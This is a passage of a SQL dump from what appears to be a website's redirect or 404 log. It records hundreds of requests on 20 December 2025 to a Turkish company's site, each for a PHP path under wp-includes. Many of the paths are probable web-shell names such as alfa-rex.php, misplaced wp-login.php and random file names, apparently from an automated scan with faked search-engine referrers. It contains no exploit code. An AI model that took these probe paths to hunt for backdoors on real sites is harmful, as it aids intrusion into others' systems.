05:12:57','0000-00-00 00:00:00',301),(52614,'http://3s-technologies.com.tr/en/wp-includes/requests/src/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:12:58','0000-00-00 00:00:00',301),(52615,'http://3s-technologies.com.tr/en/wp-includes/simplepie/alfa-rex.php',NULL,'https://www.google.fr/','',5,0,'2025-12-20 05:12:59','0000-00-00 00:00:00',301),(52616,'http://3s-technologies.com.tr/en/wp-includes/simplepie/autoloader.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:00','0000-00-00 00:00:00',301),(52617,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:13:01','0000-00-00 00:00:00',301),(52618,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/author.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:02','0000-00-00 00:00:00',301),(52619,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/cache.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:03','0000-00-00 00:00:00',301),(52620,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/caption.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:03','0000-00-00 00:00:00',301),(52621,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/category.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:04','0000-00-00 00:00:00',301),(52622,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/content/type/sniffer.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:05','0000-00-00 00:00:00',301),(52623,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/content/type/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:06','0000-00-00 00:00:00',301),(52624,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/content/type/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:07','0000-00-00 00:00:00',301),(52625,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/content/type/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:13:08','0000-00-00 00:00:00',301),(52626,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/content/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:13:09','0000-00-00 00:00:00',301),(52627,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/content/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:13:10','0000-00-00 00:00:00',301),(52628,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/content/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:10','0000-00-00 00:00:00',301),(52629,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/copyright.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:11','0000-00-00 00:00:00',301),(52630,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/core.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:12','0000-00-00 00:00:00',301),(52631,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/credit.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:13:13','0000-00-00 00:00:00',301),(52632,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/decode/html/entities.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:13:14','0000-00-00 00:00:00',301),(52633,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/decode/html/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:13:15','0000-00-00 00:00:00',301),(52634,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/decode/html/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:16','0000-00-00 00:00:00',301),(52635,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/decode/html/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:17','0000-00-00 00:00:00',301),(52636,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/decode/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:17','0000-00-00 00:00:00',301),(52637,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/decode/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:19','0000-00-00 00:00:00',301),(52638,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/decode/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:13:20','0000-00-00 00:00:00',301),(52639,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/enclosure.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:13:21','0000-00-00 00:00:00',301),(52640,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/exception.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:22','0000-00-00 00:00:00',301),(52641,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/file.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:23','0000-00-00 00:00:00',301),(52642,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/http/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:24','0000-00-00 00:00:00',301),(52643,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/http/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:25','0000-00-00 00:00:00',301),(52644,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/http/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:26','0000-00-00 00:00:00',301),(52645,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/iri.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:27','0000-00-00 00:00:00',301),(52646,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/item.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:28','0000-00-00 00:00:00',301),(52647,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/locator.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:29','0000-00-00 00:00:00',301),(52648,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/misc.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:30','0000-00-00 00:00:00',301),(52649,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/net/ipv6.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:31','0000-00-00 00:00:00',301),(52650,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/net/click.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:32','0000-00-00 00:00:00',301),(52651,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/net/options.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:13:32','0000-00-00 00:00:00',301),(52652,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/parse/date.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:33','0000-00-00 00:00:00',301),(52653,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/parse/product.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:13:34','0000-00-00 00:00:00',301),(52654,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/parser.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:35','0000-00-00 00:00:00',301),(52655,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/rating.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:36','0000-00-00 00:00:00',301),(52656,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/registry.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:13:37','0000-00-00 00:00:00',301),(52657,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/restriction.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:13:38','0000-00-00 00:00:00',301),(52658,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/sanitize.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:39','0000-00-00 00:00:00',301),(52659,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/source.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:40','0000-00-00 00:00:00',301),(52660,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/xml/declaration/parser.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:40','0000-00-00 00:00:00',301),(52661,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/xml/declaration/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:41','0000-00-00 00:00:00',301),(52662,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/xml/declaration/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:42','0000-00-00 00:00:00',301),(52663,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/xml/declaration/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:43','0000-00-00 00:00:00',301),(52664,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/xml/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:13:45','0000-00-00 00:00:00',301),(52665,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/xml/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:46','0000-00-00 00:00:00',301),(52666,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/xml/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:13:47','0000-00-00 00:00:00',301),(52667,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/xml/wp/wmivjqet.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:48','0000-00-00 00:00:00',301),(52668,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:48','0000-00-00 00:00:00',301),(52669,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/alfa-rex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:49','0000-00-00 00:00:00',301),(52670,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/gzdecode.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:13:50','0000-00-00 00:00:00',301),(52671,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/simplepie/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:13:51','0000-00-00 00:00:00',301),(52672,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:13:52','0000-00-00 00:00:00',301),(52673,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:13:53','0000-00-00 00:00:00',301),(52674,'http://3s-technologies.com.tr/en/wp-includes/simplepie/library/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:54','0000-00-00 00:00:00',301),(52675,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/author.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:55','0000-00-00 00:00:00',301),(52676,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:13:56','0000-00-00 00:00:00',301),(52677,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/base.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:57','0000-00-00 00:00:00',301),(52678,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/basedatacache.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:13:58','0000-00-00 00:00:00',301),(52679,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/callablenamefilter.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:13:58','0000-00-00 00:00:00',301),(52680,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/db.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:13:59','0000-00-00 00:00:00',301),(52681,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/datacache.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:00','0000-00-00 00:00:00',301),(52682,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/file.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:01','0000-00-00 00:00:00',301),(52683,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/memcache.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:14:02','0000-00-00 00:00:00',301),(52684,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/memcached.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:02','0000-00-00 00:00:00',301),(52685,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/mysql.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:03','0000-00-00 00:00:00',301),(52686,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/namefilter.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:14:04','0000-00-00 00:00:00',301),(52687,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/psr16.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:14:05','0000-00-00 00:00:00',301),(52688,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/redis.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:14:06','0000-00-00 00:00:00',301),(52689,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:14:07','0000-00-00 00:00:00',301),(52690,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:08','0000-00-00 00:00:00',301),(52691,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/cache/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:09','0000-00-00 00:00:00',301),(52692,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/caption.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:10','0000-00-00 00:00:00',301),(52693,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/category.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:11','0000-00-00 00:00:00',301),(52694,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/content/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:12','0000-00-00 00:00:00',301),(52695,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/content/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:14:13','0000-00-00 00:00:00',301),(52696,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/content/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:14','0000-00-00 00:00:00',301),(52697,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/copyright.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:15','0000-00-00 00:00:00',301),(52698,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/core.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:16','0000-00-00 00:00:00',301),(52699,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/credit.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:17','0000-00-00 00:00:00',301),(52700,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/decode/html/entities.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:18','0000-00-00 00:00:00',301),(52701,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/decode/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:19','0000-00-00 00:00:00',301),(52702,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/decode/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:19','0000-00-00 00:00:00',301),(52703,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/decode/wp-login.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:14:20','0000-00-00 00:00:00',301),(52704,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/enclosure.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:21','0000-00-00 00:00:00',301),(52705,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/exception.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:22','0000-00-00 00:00:00',301),(52706,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/file.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:23','0000-00-00 00:00:00',301),(52707,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/gzdecode.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:14:24','0000-00-00 00:00:00',301),(52708,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/http/parser.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:25','0000-00-00 00:00:00',301),(52709,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/http/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:26','0000-00-00 00:00:00',301),(52710,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/http/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:26','0000-00-00 00:00:00',301),(52711,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/http/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:27','0000-00-00 00:00:00',301),(52712,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/iri.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:14:28','0000-00-00 00:00:00',301),(52713,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/item.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:29','0000-00-00 00:00:00',301),(52714,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/locator.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:30','0000-00-00 00:00:00',301),(52715,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/misc.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:14:31','0000-00-00 00:00:00',301),(52716,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/net/ipv6.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:14:32','0000-00-00 00:00:00',301),(52717,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/net/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:33','0000-00-00 00:00:00',301),(52718,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/net/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:34','0000-00-00 00:00:00',301),(52719,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/net/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:14:35','0000-00-00 00:00:00',301),(52720,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/parse/date.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:14:36','0000-00-00 00:00:00',301),(52721,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/parse/about.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:36','0000-00-00 00:00:00',301),(52722,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/parse/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:37','0000-00-00 00:00:00',301),(52723,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/parse/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:38','0000-00-00 00:00:00',301),(52724,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/parser.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:39','0000-00-00 00:00:00',301),(52725,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/rating.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:14:40','0000-00-00 00:00:00',301),(52726,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/registry.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:41','0000-00-00 00:00:00',301),(52727,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/registryaware.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:14:42','0000-00-00 00:00:00',301),(52728,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/restriction.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:43','0000-00-00 00:00:00',301),(52729,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/sanitize.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:44','0000-00-00 00:00:00',301),(52730,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/simplepie.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:14:45','0000-00-00 00:00:00',301),(52731,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/source.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:14:46','0000-00-00 00:00:00',301),(52732,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/xml/declaration/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:14:47','0000-00-00 00:00:00',301),(52733,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/xml/declaration/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:48','0000-00-00 00:00:00',301),(52734,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/xml/declaration/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:49','0000-00-00 00:00:00',301),(52735,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/xml/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:50','0000-00-00 00:00:00',301),(52736,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/xml/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:14:51','0000-00-00 00:00:00',301),(52737,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/xml/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:51','0000-00-00 00:00:00',301),(52738,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:14:52','0000-00-00 00:00:00',301),(52739,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:53','0000-00-00 00:00:00',301),(52740,'http://3s-technologies.com.tr/en/wp-includes/simplepie/src/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:14:54','0000-00-00 00:00:00',301),(52741,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:14:55','0000-00-00 00:00:00',301),(52742,'http://3s-technologies.com.tr/en/wp-includes/text/diff.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:56','0000-00-00 00:00:00',301),(52743,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/about.php',NULL,'https://www.bing.com/','',4,0,'2025-12-20 05:14:57','0000-00-00 00:00:00',301),(52744,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:14:58','0000-00-00 00:00:00',301),(52745,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/font.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:14:59','0000-00-00 00:00:00',301),(52746,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/native.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:14:59','0000-00-00 00:00:00',301),(52747,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/shell.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:00','0000-00-00 00:00:00',301),(52748,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/string.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:15:02','0000-00-00 00:00:00',301),(52749,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:15:03','0000-00-00 00:00:00',301),(52750,'http://3s-technologies.com.tr/en/wp-includes/text/diff/engine/xdiff.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:15:04','0000-00-00 00:00:00',301),(52751,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:05','0000-00-00 00:00:00',301),(52752,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:06','0000-00-00 00:00:00',301),(52753,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:15:06','0000-00-00 00:00:00',301),(52754,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer/inline.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:07','0000-00-00 00:00:00',301),(52755,'http://3s-technologies.com.tr/en/wp-includes/text/diff/renderer/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:08','0000-00-00 00:00:00',301),(52756,'http://3s-technologies.com.tr/en/wp-includes/text/diff/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:09','0000-00-00 00:00:00',301),(52757,'http://3s-technologies.com.tr/en/wp-includes/text/diff/alfa-rex.php',NULL,'https://www.google.co.uk/','',4,0,'2025-12-20 05:15:10','0000-00-00 00:00:00',301),(52758,'http://3s-technologies.com.tr/en/wp-includes/text/diff/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:11','0000-00-00 00:00:00',301),(52759,'http://3s-technologies.com.tr/en/wp-includes/text/exception.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:12','0000-00-00 00:00:00',301),(52760,'http://3s-technologies.com.tr/en/wp-includes/text/alfa-rex.php',NULL,'https://www.google.fr/','',5,0,'2025-12-20 05:15:13','0000-00-00 00:00:00',301),(52761,'http://3s-technologies.com.tr/en/wp-includes/text/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:15:14','0000-00-00 00:00:00',301),(52762,'http://3s-technologies.com.tr/en/wp-includes/text/wp/fygcj.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:15','0000-00-00 00:00:00',301),(52763,'http://3s-technologies.com.tr/en/wp-includes/admin-bar.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:16','0000-00-00 00:00:00',301),(52764,'http://3s-technologies.com.tr/en/wp-includes/admin.php',NULL,'https://www.google.co.uk/','',3,0,'2025-12-20 05:15:17','0000-00-00 00:00:00',301),(52765,'http://3s-technologies.com.tr/en/wp-includes/assets/alfa-rex.php',NULL,'https://duckduckgo.com/','',5,0,'2025-12-20 05:15:18','0000-00-00 00:00:00',301),(52766,'http://3s-technologies.com.tr/en/wp-includes/assets/script-loader-packages.min.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:19','0000-00-00 00:00:00',301),(52767,'http://3s-technologies.com.tr/en/wp-includes/assets/script-loader-packages.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:15:20','0000-00-00 00:00:00',301),(52768,'http://3s-technologies.com.tr/en/wp-includes/assets/script-loader-react-refresh-entry.min.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:15:21','0000-00-00 00:00:00',301),(52769,'http://3s-technologies.com.tr/en/wp-includes/assets/script-loader-react-refresh-entry.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:15:22','0000-00-00 00:00:00',301),(52770,'http://3s-technologies.com.tr/en/wp-includes/assets/script-loader-react-refresh-runtime.min.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:15:23','0000-00-00 00:00:00',301),(52771,'http://3s-technologies.com.tr/en/wp-includes/assets/script-loader-react-refresh-runtime.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:24','0000-00-00 00:00:00',301),(52772,'http://3s-technologies.com.tr/en/wp-includes/assets/script-modules-packages.min.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:15:25','0000-00-00 00:00:00',301),(52773,'http://3s-technologies.com.tr/en/wp-includes/assets/script-modules-packages.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:25','0000-00-00 00:00:00',301),(52774,'http://3s-technologies.com.tr/en/wp-includes/assets/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:15:26','0000-00-00 